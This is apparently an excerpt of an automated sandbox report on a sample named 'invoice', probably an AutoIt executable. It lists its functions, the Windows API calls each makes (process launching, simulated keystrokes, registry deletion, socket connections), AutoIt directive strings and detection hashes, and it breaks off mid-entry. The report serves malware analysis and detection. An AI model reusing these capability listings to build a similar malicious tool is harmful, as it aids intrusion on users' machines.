                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                        • String ID:
                        • API String ID: 4072528602-0
                        • Opcode ID: 989c7a835479b16abbd9018607bdc67a2c589f15fa6c45d6b4758e5f091244e9
                        • Instruction ID: a5e422b510a68e1b6bff24b26e9eaea4a0fea05ea5d805648b36ab1e44ba825a
                        • Opcode Fuzzy Hash: 989c7a835479b16abbd9018607bdc67a2c589f15fa6c45d6b4758e5f091244e9
                        • Instruction Fuzzy Hash: 8D715278601205AFFB72DF58C894FAA7BE5FB09300F1540A9E9D5972D1CB32AA51DB10
                        Function 00FFF532 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00FFF55C
                        • _memset.LIBCMT ref: 00FFF625
                        • ShellExecuteExW.SHELL32(?), ref: 00FFF66A
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                          • Part of subcall function 00F9FE06: _wcscpy.LIBCMT ref: 00F9FE29
                        • GetProcessId.KERNEL32(00000000), ref: 00FFF6E1
                        • CloseHandle.KERNEL32(00000000), ref: 00FFF710
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                        • String ID: @
                        • API String ID: 3522835683-2766056989
                        • Opcode ID: 788bea499cc5b3e545c95de2a147e42db849f0ff1cd8177d22c7138a134ddbe2
                        • Instruction ID: e451b482d55e664da42f41990ffc689cb0766e8c4890e88e32ea3b68b24cf9cb
                        • Opcode Fuzzy Hash: 788bea499cc5b3e545c95de2a147e42db849f0ff1cd8177d22c7138a134ddbe2
                        • Instruction Fuzzy Hash: BB61C075A006199FCF14EF64C8859AEBBF5FF48310F188069E846AB361CB34AD45EB90
                        Function 00FE127E Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(?), ref: 00FE12BD
                        • GetKeyboardState.USER32(?), ref: 00FE12D2
                        • SetKeyboardState.USER32(?), ref: 00FE1333
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FE1361
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FE1380
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FE13C6
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FE13E9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 2496702346e08df30cc632cb50f17cfb1e58b9699b2dc3ccc12ae575f815758e
                        • Instruction ID: 1738ec1aec016407e22d1f7034ce208d3e83506cecd8c2e9bf947510cadcebe7
                        • Opcode Fuzzy Hash: 2496702346e08df30cc632cb50f17cfb1e58b9699b2dc3ccc12ae575f815758e
                        • Instruction Fuzzy Hash: 6F51C1B0E047D23EFB3686378C45BBABEA97B06314F084589E1D5458C2C6F9A8D4E761
                        Function 00FE1097 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(00000000), ref: 00FE10D6
                        • GetKeyboardState.USER32(?), ref: 00FE10EB
                        • SetKeyboardState.USER32(?), ref: 00FE114C
                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FE1178
                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FE1195
                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FE11D9
                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FE11FA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 855ece47be971be2f117609a29fc2543c4d4f2257185e32b92cd5ca9d34eac79
                        • Instruction ID: a7c908763ce6b2e752572b3bcbf65c40ad46c2d4c388ba350c185b52064ae3bc
                        • Opcode Fuzzy Hash: 855ece47be971be2f117609a29fc2543c4d4f2257185e32b92cd5ca9d34eac79
                        • Instruction Fuzzy Hash: 3E51E5B0A047D63DFB3687278C45BBA7EA97F06310F084589E2D5468C2C6A9AC88F751
                        Function 00FE56A4 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _wcsncpy$LocalTime
                        • String ID:
                        • API String ID: 2945705084-0
                        • Opcode ID: 43f90395a153804a3932a69e031b2e95c3ca578439d1e0891a6d8828df6c81ba
                        • Instruction ID: b6e93b0da4acdb3f02c7a482c259522dec8644700faa5aa7d98d460303102d16
                        • Opcode Fuzzy Hash: 43f90395a153804a3932a69e031b2e95c3ca578439d1e0891a6d8828df6c81ba
                        • Instruction Fuzzy Hash: F241D3E6C2061875CB51EBB49C46ACFB7BC9F06710F108466F908E3122E738A714E3E5
                        Function 00FE36B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FE46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FE36DB,?), ref: 00FE46CC
                          • Part of subcall function 00FE46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FE36DB,?), ref: 00FE46E5
                        • lstrcmpiW.KERNEL32(?,?), ref: 00FE36FB
                        • _wcscmp.LIBCMT ref: 00FE3717
                        • MoveFileW.KERNEL32(?,?), ref: 00FE372F
                        • _wcscat.LIBCMT ref: 00FE3777
                        • SHFileOperationW.SHELL32(?), ref: 00FE37E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                        • String ID: \*.*
                        • API String ID: 1377345388-1173974218
                        • Opcode ID: 7d1ae741f7659be5d8490d47b498bc6802aab2d4499b1680f0b94b8846ff73d6
                        • Instruction ID: 4abc0a7ae8d1258f4f014d3f4c7c502165f8949f36979289f4d73bbd293ff464
                        • Opcode Fuzzy Hash: 7d1ae741f7659be5d8490d47b498bc6802aab2d4499b1680f0b94b8846ff73d6
                        • Instruction Fuzzy Hash: 2341A2B250C3859EC752EF65C849ADBB7ECEF89350F00092EB489C3151EA38D748D756
                        Function 010072C3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 010072DC
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01007383
                        • IsMenu.USER32(?), ref: 0100739B
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010073E3
                        • DrawMenuBar.USER32 ref: 010073F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert_memset
                        • String ID: 0
                        • API String ID: 3866635326-4108050209
                        • Opcode ID: ee023f791a3b0e4179f9b4d3953ec90ebab948da834afc8b203afe2ee902b8c5
                        • Instruction ID: c42b4c1b0c61caaeb134a194593865f02be928a5087007a084a580b73cf2b7c9
                        • Opcode Fuzzy Hash: ee023f791a3b0e4179f9b4d3953ec90ebab948da834afc8b203afe2ee902b8c5
                        • Instruction Fuzzy Hash: 7E412C75A00209EFEB22DF54D884E9ABBF8FB04314F058069EE9597290D735B951CF90
                        Function 0100102D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0100105C
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01001086
                        • FreeLibrary.KERNEL32(00000000), ref: 0100113D
                          • Part of subcall function 0100102D: RegCloseKey.ADVAPI32(?), ref: 010010A3
                          • Part of subcall function 0100102D: FreeLibrary.KERNEL32(?), ref: 010010F5
                          • Part of subcall function 0100102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01001118
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 010010E0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                        • String ID:
                        • API String ID: 395352322-0
                        • Opcode ID: c78a1b3b2c6b2b8913be395337fe15103ba1ef712935c60c131d6c76c5194432
                        • Instruction ID: 1fca62dbd8112f51e043930933a3ba0f773ad746d1836295320a6ef4d15b8aa0
                        • Opcode Fuzzy Hash: c78a1b3b2c6b2b8913be395337fe15103ba1ef712935c60c131d6c76c5194432
                        • Instruction Fuzzy Hash: 78311E71901119BFEB26DB94DC89EFFBBBCEF09340F0001A9F591A2180DB759E459BA0
                        Function 010062FF Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0100631E
                        • GetWindowLongW.USER32(01505478,000000F0), ref: 01006351
                        • GetWindowLongW.USER32(01505478,000000F0), ref: 01006386
                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 010063B8
                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010063E2
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 010063F3
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0100640D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LongWindow$MessageSend
                        • String ID:
                        • API String ID: 2178440468-0
                        • Opcode ID: 02378c949b5e359df882054589c86610f81f78b747b4b6f31971bb093ec41476
                        • Instruction ID: d41e818ab86c9c5a2e6ade1a393c53cb10ab8da357b5dc84fbad10f959bb62d1
                        • Opcode Fuzzy Hash: 02378c949b5e359df882054589c86610f81f78b747b4b6f31971bb093ec41476
                        • Instruction Fuzzy Hash: F8310634604251AFEB32CF28DC84F553BE2FB4A710F1581A8F5809F2E6CB67A850DB91
                        Function 00FF6289 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FF7EA0: inet_addr.WSOCK32(00000000), ref: 00FF7ECB
                        • socket.WSOCK32(00000002,00000001,00000006), ref: 00FF62DC
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF62EB
                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00FF6324
                        • connect.WSOCK32(00000000,?,00000010), ref: 00FF632D
                        • WSAGetLastError.WSOCK32 ref: 00FF6337
                        • closesocket.WSOCK32(00000000), ref: 00FF6360
                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00FF6379
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                        • String ID:
                        • API String ID: 910771015-0
                        • Opcode ID: 85eb1a854a6ea553d5fae765f47a35cb623c075a9ca6690d8d970632d327c2d9
                        • Instruction ID: 12ae0d588e3906a35461e9cbe84834384c6e01c393475742dfdca00e520b30d2
                        • Opcode Fuzzy Hash: 85eb1a854a6ea553d5fae765f47a35cb623c075a9ca6690d8d970632d327c2d9
                        • Instruction Fuzzy Hash: 5431E431600218AFDB20AF60CC85BBE77A9EF44724F044019FA46D7290DB79AD04ABA1
                        Function 00FDF98F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 1038674560-2734436370
                        • Opcode ID: 8463cbd3ea9e9aa46db74e6d6fe48a84eb1b19c78ba975f7bd8e7982a9eb9f94
                        • Instruction ID: 0e9a65b424cdecd9f163aeaaf0580ee41270fb5a407ad76c9f46a82f98cd1ca6
                        • Opcode Fuzzy Hash: 8463cbd3ea9e9aa46db74e6d6fe48a84eb1b19c78ba975f7bd8e7982a9eb9f94
                        • Instruction Fuzzy Hash: 6E214C739086117BD221BA259C52FB773DADF56320F684037F48B86241EB9C9D86F391
                        Function 010075FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                          • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                          • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01007664
                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 01007671
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0100767C
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0100768B
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01007697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$CreateObjectStockWindow
                        • String ID: Msctls_Progress32
                        • API String ID: 1025951953-3636473452
                        • Opcode ID: a40a089164932eb8ab2825d073509a40f03e1792f3ecccc034ca9144d4c69f89
                        • Instruction ID: dc4ad77d109a05b767f10c091fcf7a54837705b21c9b84306990b5478c051b13
                        • Opcode Fuzzy Hash: a40a089164932eb8ab2825d073509a40f03e1792f3ecccc034ca9144d4c69f89
                        • Instruction Fuzzy Hash: 2A11C8B2110219BFFF159F65CC85EE77F5DEF0C758F014115B644A6091C676AC21DBA0
                        Function 00FA4109 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FA41D2,?), ref: 00FA4123
                        • GetProcAddress.KERNEL32(00000000), ref: 00FA412A
                        • EncodePointer.KERNEL32(00000000), ref: 00FA4136
                        • DecodePointer.KERNEL32(00000001,00FA41D2,?), ref: 00FA4153
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                        • String ID: RoInitialize$combase.dll
                        • API String ID: 3489934621-340411864
                        • Opcode ID: b6765f030ebc525fc8261458c2ab796193fd468261207024ba72af1583e8552d
                        • Instruction ID: 9952b1459bf7a6de662ddd2b7ac9845cb6d32673fbe4037daf7bfd7bc2fef57c
                        • Opcode Fuzzy Hash: b6765f030ebc525fc8261458c2ab796193fd468261207024ba72af1583e8552d
                        • Instruction Fuzzy Hash: 45E01AB4A90351AFEB316B71ED8DB043AA4B756B16F509428B481ED098CBBF6080AF00
                        Function 00FA41DE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FA40F8), ref: 00FA41F8
                        • GetProcAddress.KERNEL32(00000000), ref: 00FA41FF
                        • EncodePointer.KERNEL32(00000000), ref: 00FA420A
                        • DecodePointer.KERNEL32(00FA40F8), ref: 00FA4225
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                        • String ID: RoUninitialize$combase.dll
                        • API String ID: 3489934621-2819208100
                        • Opcode ID: 06279e3ad4c219c8455bbdc6c208b41d3b0e5c26d5e35f78790c6821645de472
                        • Instruction ID: 2cefc0b5be974efa8e291b7f42830fa4da5bbd8cacc1afc680cbea97f21e56ec
                        • Opcode Fuzzy Hash: 06279e3ad4c219c8455bbdc6c208b41d3b0e5c26d5e35f78790c6821645de472
                        • Instruction Fuzzy Hash: 74E0B6F4981311ABEB31AB61EE4EB443AB4BB05752F209018F591E909CCBBF5500EB10
                        Function 00FE6561 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove$__itow__swprintf
                        • String ID:
                        • API String ID: 3253778849-0
                        • Opcode ID: e08ce53f9d9641d01672f110f1d8884bd2845bf33452a8bec21962e3e20d00d8
                        • Instruction ID: f6476f21ec2a8627866f24392dd43d91fa842a12c7525c1fc0ea6ffac1f39470
                        • Opcode Fuzzy Hash: e08ce53f9d9641d01672f110f1d8884bd2845bf33452a8bec21962e3e20d00d8
                        • Instruction Fuzzy Hash: 8D61897150429AAFCF11FF21DC86AFE77A4AF45308F084519F859AB192DF78A901EB50
                        Function 0100026F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 01000EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFE38,?,?), ref: 01000EBC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000348
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01000388
                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 010003AB
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010003D4
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 01000417
                        • RegCloseKey.ADVAPI32(00000000), ref: 01000424
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                        • String ID:
                        • API String ID: 4046560759-0
                        • Opcode ID: ce2a222dc0e5f07488c34848961199e267d19a7bc203c537fa69d013cfbbd0a9
                        • Instruction ID: 54f16c29a46bd5810bb663e72d709176c099455bd82c4f4eb33ece412bdcaadd
                        • Opcode Fuzzy Hash: ce2a222dc0e5f07488c34848961199e267d19a7bc203c537fa69d013cfbbd0a9
